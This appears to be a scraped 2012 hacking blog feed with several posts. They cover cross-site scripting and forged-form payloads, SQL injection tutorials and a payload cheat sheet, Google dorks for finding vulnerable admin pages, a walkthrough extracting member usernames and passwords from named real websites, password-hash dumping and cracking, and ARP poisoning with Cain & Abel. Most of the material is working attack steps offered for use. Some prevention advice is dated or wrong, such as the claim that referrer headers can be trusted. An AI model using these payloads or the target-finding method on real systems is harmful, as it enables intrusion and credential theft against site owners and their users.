method="GET". The above code can be placed on a static web page<br />
on a web server controlled by the attacker and then the link sent to<br />
the target. Another vector to deliver the form and javascript to the<br />
target is via a site vulnerable to XSS through a GET request.<br />
In either case above the attacker sends the target the malicious web<br />
page, the malicious web page forms the request and the request is<br />
sent to the vulnerable server. This advances the classical cross site<br />
scripting attack from a single hop (target --> page within vulnerable<br />
website containing inserted code) to two hops (target --> intermediary<br />
request formulation page --> page within vulnerable website<br />
containing inserted code).<br />
<br />
<b>Expansion on POST: secure areas</b><br />
The problem of password protected areas also arises, where a<br />
password is required every time the user accesses the website. In<br />
many websites which require secure client access the cookie is not<br />
persistent to prevent further users on the computer from logging in to<br />
the account.<br />
Building upon the code presented above we can circumvent any<br />
restrictions and still steal the session cookie for the temporary<br />
session. Unfortunately the time window in which attacks can take<br />
place in many cases is very small, with the help of iDefense's idea of<br />
automating attacks this small time window is no longer an issue. By<br />
adding code on the intermediary web page which opens a new<br />
window with the login prompt the user may now log in to the secured<br />
area (some social engineering might be required in order to force the<br />
user to log in). See code below.<br />
<form method="POST" action="http://vulnerable.com/search"<br />
name="explForm"><br />
<input type=hidden name=q value="<script>alert<br />
(document.cookie)</script>"><br />
</form><br />
<script language="Javascript"><br />
window.open(“http://vulnerable.com/secure_login”);<br />
setTimeout('explForm.submit()', 1000*30);<br />
</script><br />
Note: changes from previous code diplayed in bold<br />
With the intermediary web page still in the background, the form<br />
submission may now be timed to allow the user to log in successfully<br />
before the exploit is sent. To change the time until the form is<br />
submitted change the second argument in the setTimeout function,<br />
this is the time in milliseconds until the javascript code in argument<br />
one is executed. With the user successfully logged in a child window<br />
of the intermediary web page, when the form on the intermediary web<br />
page is submitted the form will go directly to the problematic script,<br />
malicious code inserted, and the user session may be stolen.<br />
Using an intermediary for exploitation slightly increases the<br />
complexity of a successful attack but allows for a high degree of<br />
flexibility, any variable that is used on a dynamically created web<br />
page which does not sanitize HTML markup is vulnerable to cross site<br />
scripting.<br />
<br />
<b>Generalized Client Automation</b><br />
Generalizing on the above technique brings to light another, and in<br />
some cases a very serious, vulnerability. The proposed technique<br />
allows an attacker to fill out forms with data they specify and submit<br />
them automatically under the context of the client. Any forms which<br />
accept data from the client, assuming they in fact inputted the data<br />
they are submitting, are vulnerable.<br />
This arises when the form itself is dependent only on static or<br />
predictable information (information given to a third party site such<br />
as referrer can help in prediction). Using the method of exploitation<br />
presented above, client automation of form submission is a trivial<br />
task.<br />
<form method="POST"<br />
action="http://vulnerable.com/changeMailSettings" name="f"><br />
<input type=hidden name=reply_to value="attacker@h4x.com"><br />
<input type=hidden name=signature value=”<a<br />
href=http://h4x.com/exploit.htm>Click here</a> for a free<br />
computer security test, trust me, I used it and was<br />
amazed!”><br />
</form><br />
<script language="Javascript"><br />
f.submit();<br />
</script><br />
An interesting use of this would be the creation of a webmail<br />
signature virus. Using the techniques presented above the attacker<br />
could compose a web page that when visited would automate the the<br />
form which changes the signature sent out on emails to contain the<br />
link to the malicious page itself. Every time a user “infected” with the<br />
signature virus would send an email unknowingly they would also<br />
send along text and a link persuading the next victim to also click it,<br />
and become infected. Easy automated spamming? Yes.<br />
Hotmail and Yahoo! Mail have both been tested for this vulnerability<br />
and they are secure against it, however each appear to have<br />
combated the flaw in very different ways. Hotmail uses a simple<br />
referrer check, if the referrer is not from an authorized Hotmail page<br />
the user is sent directly to a login page. Yahoo enacted a very novel<br />
approach to fix the problem, on each form there is a hidden value<br />
named “.crumb” which is related to the cookie. All protection against<br />
this flaw lies within the crumb, if the crumb can be predicted without<br />
the cookie then Yahoo is vulnerable to this flaw.<br />
<br />
<b>Prevention</b><br />
Because the generalized client automation attack is very simple at the<br />
server end (ideally the server views only a legitimate request by the<br />
client) it is somewhat more difficult to prevent. Due to the fact that<br />
the client forms the request at their browser HTTP Referrer headers<br />
can be trusted and should be validated to ensure they come from an<br />
internal script inside the system. Referrer checking assumes however<br />
that the attacker can not insert arbitrary HTML in to any of the<br />
trusted scripts, though such attack would be considered cross site<br />
scripting and separate from this.<br />
At the very minimum to protect against cross site scripting attacks<br />
user input must be stripped of any potentially dangerous characters<br />
such as < > “ &. As any conscientious security professional would do,<br />
I must preach the importance of the whitelisting approach over<br />
blacklisting; in whitelisting only explicitly allowed characters are<br />
permitted in the input. It appears that all security vulnerabilities stem<br />
from user input, “Hello world” can not be exploited unless the<br />
attacker can manage in some form to input data. This should lead us<br />
to believe that it is trivial to ensure security (in a large amount of<br />
cases of cases, but not all) by validating user input to a strict form.<br />
Regular expressions are extremely powerful for the task of<br />
whitelisting characters and validating that data does in fact conform<br />
to the form standards (include length constraints also in the concept<br />
of form). Once data is validated to a set of criteria security analysis is<br />
purely creative thinking of how the criteria may be managed to let<br />
through specific items it should not.<br />
Another option to aid in the prevention of security flaws is a project I<br />
am affiliated with, currently code named Nirvana. This project is<br />
devoted to creation of user input filters and validation function to help<br />
developers create secure code faster. The project page is now housed<br />
at http://libox.net/sanitize.php but will soon be moving to<br />
http://www.owasp.org.<br />
My home on the web is http://libox.net/, the most current version of<br />
this document may be found there.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com11tag:blogger.com,1999:blog-8450897627020793899.post-81711188656419439822012-11-22T07:39:00.000-08:002012-12-01T09:08:27.119-08:00sql injection attack<div dir="ltr" style="text-align: left;" trbidi="on">Q what is sql injection?<br />
<br />
A injecting sql queries into another database or using queries to get auth bypass as an admin.<br />
<br />
part 1 : Basic sql injection<br />
<br />
Gaining auth bypass on an admin account.<br />
Most sites vulnerable to this are .asp<br />
First we need 2 find a site, start by opening google.<br />
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"<br />
There is a large number of google dork for basic sql injection.<br />
here is the best:<br />
"inurl:admin.asp"<br />
"inurl:login/admin.asp"<br />
"inurl:admin/login.asp"<br />
"inurl:adminlogin.asp"<br />
"inurl:adminhome.asp"<br />
"inurl:admin_login.asp"<br />
"inurl:administratorlogin.asp"<br />
"inurl:login/administrator.asp"<br />
"inurl:administrator_login.asp"<br />
<br />
Now what to do once we get to our site.<br />
the site should look something like this :<br />
<br />
welcome to xxxxxxxxxx administrator panel<br />
username :<br />
password :<br />
<br />
so what we do here is in the username we always type "Admin"<br />
and for our password we type our sql injection<br />
<br />
here is a list of sql injections<br />
<br />
' or '1'='1<br />
' or 'x'='x<br />
' or 0=0 --<br />
<br />
" or 0=0 --<br />
<br />
or 0=0 --<br />
<br />
' or 0=0 #<br />
<br />
" or 0=0 #<br />
<br />
or 0=0 #<br />
<br />
' or 'x'='x<br />
<br />
" or "x"="x<br />
<br />
') or ('x'='x<br />
<br />
' or 1=1--<br />
<br />
" or 1=1--<br />
<br />
or 1=1--<br />
<br />
' or a=a--<br />
<br />
" or "a"="a<br />
<br />
') or ('a'='a<br />
<br />
") or ("a"="a<br />
<br />
hi" or "a"="a<br />
<br />
hi" or 1=1 --<br />
<br />
hi' or 1=1 --<br />
'or'1=1'<br />
<br />
<br />
there are many more but these are the best ones that i know of<br />
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.<br />
<br />
So your input should look like this<br />
<br />
username:Admin<br />
password:'or'1'='1<br />
<br />
So click submit and you'r in<br />
NOTE not all sites are vulnerable.<br />
<br />
<br />
part 2: injecting sql queries to extract the admin username and password<br />
<br />
ok so lets say we have a site :<br />
http://www.xxxxx.com/index.php?catid=1<br />
there is a list of dork 4 sites lyk this<br />
<br />
"inurl:index.php?catid="<br />
"inurl:news.php?catid="<br />
"inurl:index.php?id="<br />
"inurl:news.php?id="<br />
or the best in my view "full credit to qabandi for discovering this"<br />
"inurl:".php?catid=" site:xxx"<br />
<br />
<br />
So once you have you'r site<br />
http://www.xxxx.com/index.php?catid=1<br />
now we add a ' to the end of the url<br />
so the site is<br />
http://www.xxxx.com/index.php?catid=1'<br />
if there is an error of some sort then it is vulnerable<br />
now we need to find the number of columns in the sql database<br />
so we type<br />
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"<br />
<br />
so this database has 4 columns because we got an error on 5<br />
on some databases there is 2 columns and on some 200 it varies<br />
so once we have the column number.<br />
we try the union function<br />
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"<br />
if you see some numbers like 1 2 3 4 on the screen or the column names<br />
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db<br />
so now we need to info about the db<br />
so lets say the numbers 2 and 4 showed up on the screen<br />
so i will use my query on 2<br />
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--<br />
the db type and version will pop up on the screen<br />
if the db version is 4 or lower then to extract the password you will need these queries<br />
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--<br />
this should display the table containing the admin username and password<br />
but if not then you will have to guess the table<br />
so once you have your table "or not"<br />
then type<br />
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--<br />
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess<br />
then once u have the right table name you should get the administrator password<br />
then just do the same thing but type username instead of password<br />
sometimes the password is hashed and you need to crack it.<br />
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de..../admin_1.2_.txt<br />
now if the database is version 5 or up<br />
type<br />
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--<br />
and that will display a list of all the tables<br />
once you have your table name<br />
type the same thing as 4<br />
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--<br />
then the same with username<br />
but now if it doesnt work far all those things<br />
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing<br />
just play around with those<br />
but sometimes we also need to use the version() or version@@<br />
so sometimes UNION SELECT version (),password,3,4 FROM admintable--<br />
or UNION SELECT version @@,password,3,4 FROM admintable-- </div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com17tag:blogger.com,1999:blog-8450897627020793899.post-29612725985594569692012-11-22T07:36:00.003-08:002012-11-27T21:54:32.490-08:00sql injection cheat sheet<div dir="ltr" style="text-align: left;" trbidi="on">
'or''='<br />
<br />
1 OR 1=1<br />
<br />
1' OR '1'='1<br />
<br />
' or 1=1 or ''='<br />
<br />
' or '1'='1<br />
<br />
' or 'x'='x<br />
<br />
' or 0=0 --<br />
<br />
" or 0=0 --<br />
<br />
or 0=0 --<br />
<br />
' or 0=0 #<br />
<br />
" or 0=0 #<br />
<br />
or 0=0 #<br />
<br />
' or 'x'='x<br />
<br />
" or "x"="x<br />
<br />
') or ('x'='x<br />
<br />
' or 1=1--<br />
<br />
" or 1=1--<br />
<br />
or 1=1--<br />
<br />
' or a=a--<br />
<br />
" or "a"="a<br />
<br />
') or ('a'='a<br />
<br />
") or ("a"="a<br />
<br />
hi" or "a"="a<br />
<br />
hi" or 1=1 --<br />
<br />
hi' or 1=1 --<br />
<br />
'or'1=1'</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6tag:blogger.com,1999:blog-8450897627020793899.post-29245279152056886062012-11-22T07:32:00.003-08:002012-11-27T21:15:56.830-08:00sql injection tutorial with examples<div dir="ltr" style="text-align: left;" trbidi="on">SQL INJECTION:<br />
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user<br />
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.<br />
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.<br />
<br />
<br />
Imagine that you found this site:<br />
<br />
http://www.guitarists.net/<br />
<br />
<br />
<br />
Now 1st of all we need to Find the url like this to test sql injection.<br />
<br />
id=xyz<br />
<br />
<br />
<br />
Okay suppose we are going with this url<br />
<br />
http://www.guitarists.net/links/list.php?id=253<br />
<br />
<br />
<br />
To test the file that has the variable list.php id badly planned, and if we fit in a simple, 'and give us an error identical to that<br />
<br />
http://www.guitarists.net/links/list.php?id=253<br />
<br />
<br />
<br />
'<br />
<br />
<br />
<br />
Error:<br />
<br />
Quote:<br />
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57<br />
<br />
<br />
Now we will explore it.<br />
<br />
<br />
The First Step of all, and find out how many columns have, as we get the correct column, we'll see something different<br />
<br />
<br />
Code:<br />
Code:<br />
-1+union+select+<br />
<br />
<br />
<br />
This is the basic syntax for this example of attack, but of course you can be<br />
done differently, but I find this easier to start.<br />
<br />
Keep Adding Numbers to guess the Correct colunms like this<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]<br />
<br />
<br />
<br />
Beat the SQL error here, here and found that the web, has 4 columns!<br />
<br />
Also appears to us the number 1, that is, we know that the column 1 are vulnerable, and it is through them that we are going for a steal information<br />
So now we know, we have 4 columns and column 1 is vulnerable, we will use.<br />
<br />
Information_Schema.Tables<br />
<br />
table_name & information_schema.tables--<br />
<br />
<br />
<br />
It helps us to Find the table names. Now our Link Would be Like This<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--<br />
<br />
<br />
<br />
Replacing the vulnerable column 1 in the string table_name.<br />
<br />
<br />
Note: Here you can see all table, but not always that happens in certain websites, so we can see one by one, and for this you use the term +limit+*,1--<br />
<br />
Like:<br />
<br />
http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--<br />
...<br />
<br />
<br />
<br />
Well continuing with our web ...<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--<br />
<br />
<br />
<br />
As we can see there are a lot of tables, but have doubt, is the table members! because we have to stole data from members. admin, administrators etc.<br />
<br />
As we can see there is no table like Administrator or admin so now we will try to Explore members and check it What info it has<br />
Now we need to see the columns that the table has for so we used the syntax.<br />
<br />
column_name &<br />
information_schema.columns<br />
<br />
<br />
<br />
And our url will be like this.<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--<br />
<br />
<br />
<br />
Don't confuse going to Explain it now :-j<br />
<br />
+where ---> Where?<br />
+table_name= ---> Name of Table?<br />
char() ---> Name of Table in ASCII<br />
<br />
<br />
e.g:<br />
<br />
Code:<br />
<br />
Code:<br />
m = 109<br />
e = 101<br />
m = 109<br />
b = 98<br />
e = 101<br />
r = 114<br />
s = 115 <br />
<br />
<br />
<br />
Google it "Table in ASCII" you will get the whole table.<br />
<br />
Well, now let's find out what we see in<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--<br />
<br />
<br />
<br />
w0w we succeeded to grab the required info.<br />
<br />
Cheers!!<br />
<br />
Well, what interests us and the column<br />
<br />
Login and password that it is ..<br />
<br />
Well, now we make the final injection, the data to steal login and password<br />
<br />
The injection is made of the following way ..<br />
<br />
To see Login:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--<br />
<br />
<br />
<br />
To see Passwords:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--<br />
<br />
<br />
<br />
There is a much simpler method, which is to see everything<br />
at the same time using the syntax.<br />
<br />
concat( )<br />
<br />
<br />
<br />
well, concat serves to unite all at once, then our url would be like this:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--<br />
<br />
<br />
<br />
Quote<br />
0x3a -> Hexadecimal code, used to insert : between one and another, not to be confused<br />
<br />
<br />
All Passwords are in text-plain not in hash!<br />
<br />
Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.<br />
<br />
This Tutorial is Written for Educational purpose, I am not responsible if anyone use it for illegal purpose. <br />
</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6tag:blogger.com,1999:blog-8450897627020793899.post-52147176332728858502012-11-22T07:30:00.001-08:002012-12-01T09:08:14.278-08:00What is a sql injection<div dir="ltr" style="text-align: left;" trbidi="on">What is SQL Injection?<br />
SQL Injection - \S-Q-L-in-'jek-shen\ - Noun<br />
The technique of inputting malicious data into an SQL statement, which would therefore make the vulnerability present on the database layer.<br />
<br />
What It Looks Like?<br />
The vast majority of all SQL injections will take place on an input form.<br />
The most basic of all SQL injections will look like the following:<br />
<br />
The Basic SQL injection is :<br />
<br />
<br />
Quote:<br />
Variable' or 1=1--<br />
<br />
<br />
Let’s say we have a login form. By inputting the above code, we can use our SQL injection to gain login even without proper credentials!<br />
<br />
How’s it work?<br />
Take a look..<br />
<br />
<br />
Code:<br />
SELECT * FROM users WHERE username = 'Variable' or 1=1--'<br />
<br />
<br />
<br />
See how our code is nicely injected into the query? The result of this query will grant us access regardless of the username, since the result of “1=1? will always be true. In this case, we bypass the whole selection process.<br />
<br />
You may have been wondering what the double dashes are for ( — ). These dashes at the end tell the SQL server to ignore the rest of the query. If the exploit isn’t being used on an SQL server, then omitting the double dashes and ending single quote will get the desired results.<br />
<br />
Note that while this is the most standard way, it certainly isn’t the only way that malicious users will gain entry. SQL queries will differ greatly from one syntax to another.<br />
It’s also common to see the following:<br />
<br />
<br />
Code:<br />
') or ('1'='1<br />
"or "1"="1<br />
' or '1'='1<br />
Or 1=1--<br />
" or 1=1--<br />
' or 1=1--<br />
<br />
<br />
<br />
SQL Injection: Attacking Via URLs<br />
As we know it is possible to attack an SQL server through URL and usually much more dangerous to webmasters.<br />
When using PHP and SQL, there is commonly a URL such as the following:<br />
<br />
<br />
Code:<br />
http://YourWebsite.com/page.php?id=2<br />
<br />
<br />
<br />
By adding a little SQL to the end of the URL, we can attack on SQL server..<br />
<br />
I think this is enough, Now Let’s finally find out how to secure your website from SQL injection.<br />
<br />
<br />
SQL Injection Prevention: Editing Lengths Of Form Components<br />
The first step in the process is simple: simply restrict input fields to the absolute minimum- usually anywhere from 7-12 characters is fine. Doing so will make long queries unable to be input, since the field is only enough characters for smaller queries. This will actually not prevent an SQL injection, but will make work harder for those trying to make use of one.<br />
<br />
Note :SQL injection users can simply make a new form and remove the limits on the character length, since the length is in plain HTML and viewable (and editable) by anyone.<br />
<br />
SQL Injection Prevention: Data Type Validation<br />
Another good idea is to validate any data once it is received. If a user had to input an age, make sure the input is an actual number. If it was a date, make sure the date is in proper format. Again, this will not prevent an SQL injection in itself- it just makes work harder for those trying to exploit an SQL server.<br />
<br />
Note: This is still only slowing attackers down- but isn’t it much more satisfying to have them waste their time before finding out one’s own query is impervious to harm?<br />
<br />
SQL Injection Prevention: The Solution In Preventing SQL Attacks<br />
We’ll accomplish this with a simple function that the developers of PHP made especially for SQL injections. We call this function mysql_real_escape_string() - take a look at it below:<br />
<br />
Code:<br />
$name = "John";<br />
$name = mysql_real_escape_string($name);<br />
$SQL = "SELECT * FROM users WHERE username = '$name'";<br />
<br />
<br />
<br />
Although for a more practical use, we would have the $name variable pointed to a POST result, as seen below:<br />
<br />
Code:<br />
$name = mysql_real_escape_string($_POST['user']);<br />
<br />
<br />
<br />
And we can even make things easier by putting it into one line:<br />
<br />
Code:<br />
$SQL = "SELECT * FROM users where username = "mysql_real_escape_string($POST['user']);<br />
<br />
<br />
<br />
So what’s the output like if malicious users try to get access to our SQL server?<br />
Their attempts may look something like this:<br />
<br />
<br />
Code:<br />
$malcious_input = "' OR 1'";<br />
// The Above Is The Malicious Input. Don't Be Scared!<br />
// With The mysql_real_escape_string() usage, the following is obtained:<br />
<br />
\' OR 1\'<br />
// Notice how the slashes escape the quotes! Now users can't enter malicious data<br />
<br />
<br />
<br />
And the best part is, they just wasted their time and effort for nothing.<br />
<br />
Lastly, note that there are libraries and classes that can help aid in the fight against SQL injection. Prepared statements are plausible as well, but as for us, we enjoy sticking to the mysql_real_escape_string() function for less headaches.<br />
</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com5tag:blogger.com,1999:blog-8450897627020793899.post-37165597559522346842012-11-18T10:38:00.000-08:002012-11-27T00:12:14.661-08:00How to get back links for free<div dir="ltr" style="text-align: left;" trbidi="on"><b>25 Backlinks Everyday</b> You<br />
don’t have to add any reciprocal link to your site. Just submit your<br />
form everyday and get free backlinks<br />
<br />
Step 1 : <a href="http://www.socialmonkee.com/">Register Here</a>.<br />
<br />
Step 2 : Now you have to ad a Firefox plugin. [Don’t worry they are<br />
providing a guide]<br />
<br />
Step 3: As a free member you can get 25 Backlink everyday.<br />
Means 750 backlink per month.<br />
<br />
Step 4 : Everyday fill the submission form.<br />
<br />
For more You can also trace the backlink because they are provide a<br />
submission report after submission. Most people do not execute this<br />
steps.<br />
<br />
Getting backlink is not enough. You have to inform search engine<br />
that you are here.<br />
<br />
Step 5: Open your report and copy all that links.<br />
<br />
Step 6: Go to <a href="http://www.pingfarm.com/">Pingfarm</a>. Noe paste that all link and press button of<br />
mass pinging.<br />
<br />
Here your job gets finished. Do this things everyday and in this way<br />
you will get free backlinks.</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-39583062413303104762012-11-18T10:27:00.001-08:002012-11-27T21:34:55.719-08:00How to copy text from protected PDF<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://www.bestpdftool.com/pdf-password-remover.html">PDF Password Remover</a> is a professional tool for breaking PDF copy protection. After removing PDF encryption, you can copy text from protected PDF files for reusing.<br />
<br />
Step 1: Import encrypted PDF<br />
After installing and launching the software, click “Add files” button to batch upload encrypted PDF files to the program.<br />
<br />
Step 2: Output folder setting<br />
Then only need to click the "Customize" button to set the output folder for the converted files.<br />
<br />
Step 3: Remove copy password PDF<br />
At last, click "Convert" button to remove the copy password from PDF files. <br />
<br />
Then, click "Open" to find the converted secure PDF files, and you can copy text from protected PDF files and reuse them.<br />
</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com8tag:blogger.com,1999:blog-8450897627020793899.post-25139475322198431522012-11-18T10:08:00.000-08:002012-11-27T21:55:50.615-08:00ARP cache poisoning with cain abel<div dir="ltr" style="text-align: left;" trbidi="on">
1) Start Cain<br />
<br />
2) Click blue + icon on the upper left, note username (ID) and Password and<br />
URL of resource it was saved for on the Protected Storage tab.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVRIU_EfbZudfN0kFg079ZWWodAwy1fbjl67WmCfYfQ1uDPpFgFJX3tpfCC1B-Vghq8-qlAfjSwazh2oH70f_LVaAQunlZTXEabyRUiVtSztrmrr3u3pXo7Tj73ESkg6bRgePMSKk1EMA/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVRIU_EfbZudfN0kFg079ZWWodAwy1fbjl67WmCfYfQ1uDPpFgFJX3tpfCC1B-Vghq8-qlAfjSwazh2oH70f_LVaAQunlZTXEabyRUiVtSztrmrr3u3pXo7Tj73ESkg6bRgePMSKk1EMA/s320/1.PNG" width="320" /></a></div>
<br />
3) To save information from any of the Protected Storage sites:<br />
a. Click on one of the resources<br />
b. Right click and select Export<br />
c. Key in name such as resc1.txt<br />
d. Now, open file using notepad or similar text editor<br />
<br />
4) To delete entry, left click on item, select either Remove or Remove All.<br />
<br />
To find Windows login ID and passwords on a local machine.<br />
<br />
• Create three users on your local machine. Make the accounts as follows:<br />
user1 with password of password, user2 with password of 1password1,<br />
and user 2 with password of 123xyz321.<br />
Now proceed to #1 below.<br />
<br />
With the different passwords selected, you will be able to examine how<br />
password difficulty affects auditing and cracking techniques.<br />
<br />
1) Click on Cracker tab<br />
<br />
2) Click on LM & NTLM Hashes<br />
<br />
3) Click on + sign icon on toolbar then Dump NT Hashes from Local machine. *<br />
Note, if you have a SAM file from an NT/win2k/XP machine you can also use<br />
the import option to import from that. *See bottom of lab on remote<br />
installation of Abel to see how you might gain access to a SAM file from a<br />
remote PC.<br />
<br />
4) Click Next<br />
<br />
5) On Guest id, right click and select dictionary attack NTLM. Select Add, then<br />
browse to where cain is installed (possibly in c:\program\files\cain) Then<br />
select wordlists folder and wordlist.txt. Then click Start.<br />
<br />
6) Note options such as As is Password, etc. Also note that you could use a<br />
Brute force attack if you had no luck on a dictionary word from a list file.<br />
However, this would take much longer.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7OLwfsQ8dS67kKrPkNo-nD7IztCoD7DsefLMH6uyt29c2JvpqJOxAKTFjdFmSsJ9iVHpo-dKGfKp24zEy5JhJkGd2xpnhkFojjmJZkeqX8FBot6QukrEu58n7vXCTMYdHacvj58QHwho/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7OLwfsQ8dS67kKrPkNo-nD7IztCoD7DsefLMH6uyt29c2JvpqJOxAKTFjdFmSsJ9iVHpo-dKGfKp24zEy5JhJkGd2xpnhkFojjmJZkeqX8FBot6QukrEu58n7vXCTMYdHacvj58QHwho/s320/2.PNG" width="320" /></a></div>
<br />
<b>Using APR</b> – ARP Poison Routing.<br />
Theory -- On an Ethernet/IP network, when host A wants to send a packet to<br />
host B, it must know the MAC or physical address of the machine and IP<br />
address. It also needs to know the application layer protocol (IP) address, but<br />
the physical MAC is required for construction of the Ethernet frame. Review<br />
the OSI model if you are unclear on these concepts. In short we have to have<br />
both.<br />
Once it knows the MAC's of the machines on the network, it keeps them stored<br />
in an ARP cache table. However, before it can “know” it has to query the<br />
network to find out the addresses. A host does this by sending out an ARP<br />
request on broadcast to FFFFFFFFFFFF. Only the station with the specified IP<br />
will reply in unicast with an ARP reply packet to the requesting station with it's<br />
MAC. Now host A has an updated table entry for host B and it will<br />
communicate now in unicast directly to it by using the MAC of B in the<br />
Ethernet frame. ARP request and reply packets are only sent if the host<br />
doesn't know the destination machines MAC. Again, once it is learned the<br />
cache is used....this is a key point to why APR works.<br />
<br />
<b>How APR works</b> – ARP Poison Routing uses the stored cache as a way to reroute<br />
or re-direct packets from a target, to an intermediary machine, then<br />
forward to the host, thus the middle machine “sees” all traffic between target<br />
and host, even if on a switched LAN. First the target MAC address must be<br />
established, then the APR feature “poisons” the cache of the target by forcing<br />
a cache update with the path re-routed so that the middle machine forwards<br />
traffic to and from host and target. The middle machine can now examine<br />
packets with a sniffer such as Ethereal, Nmap, or others.<br />
<br />
<b>Instructions to use APR</b>:<br />
** Before you try this, you must make sure that WinPcap is properly bound to<br />
your NIC. Select Configure and make sure you see your adapter ( s) listed.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGSmL7C4dVttmbZixKpjB3BDaUBmQ6HroT7yOQl4vrbsZxbfLscob_F7AjJxW742gj_f-ehEcsIIkb8AzzDPGQqHo-_CI3Q6kxG88OVObTc-kkU-oP1OHiTZnn-gYCZxWqsvZhJPWvJXk/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGSmL7C4dVttmbZixKpjB3BDaUBmQ6HroT7yOQl4vrbsZxbfLscob_F7AjJxW742gj_f-ehEcsIIkb8AzzDPGQqHo-_CI3Q6kxG88OVObTc-kkU-oP1OHiTZnn-gYCZxWqsvZhJPWvJXk/s320/3.PNG" width="320" /></a></div>
<br />
At main screen, select Configure, then click your your network adapter, then<br />
Apply and Ok.<br />
<br />
1) Click to enable both Sniffer and APR (Left of the + ). <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeN1KbkCvEIqUsUwm5N4opX9OhrXkdxy-a4A6XjRJCQXuYhQU5GLR3UXYC4Hl4MHI8VFe6b79yfOKnPdBGn8uOVNl-HWSqzd7TfGn757RvPUI0PaxmC73SwuWqp8JF097sORBH_Fx-mM/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeN1KbkCvEIqUsUwm5N4opX9OhrXkdxy-a4A6XjRJCQXuYhQU5GLR3UXYC4Hl4MHI8VFe6b79yfOKnPdBGn8uOVNl-HWSqzd7TfGn757RvPUI0PaxmC73SwuWqp8JF097sORBH_Fx-mM/s320/4.PNG" width="320" /></a></div>
<br />
2) Click on +, then Range. Range for your network (based on adapter you<br />
chose) is displayed. Click OK to start scanning.<br />
<br />
3) After 100% you will see IP address, MAC, and OUI fingerprint of devices in<br />
range.<br />
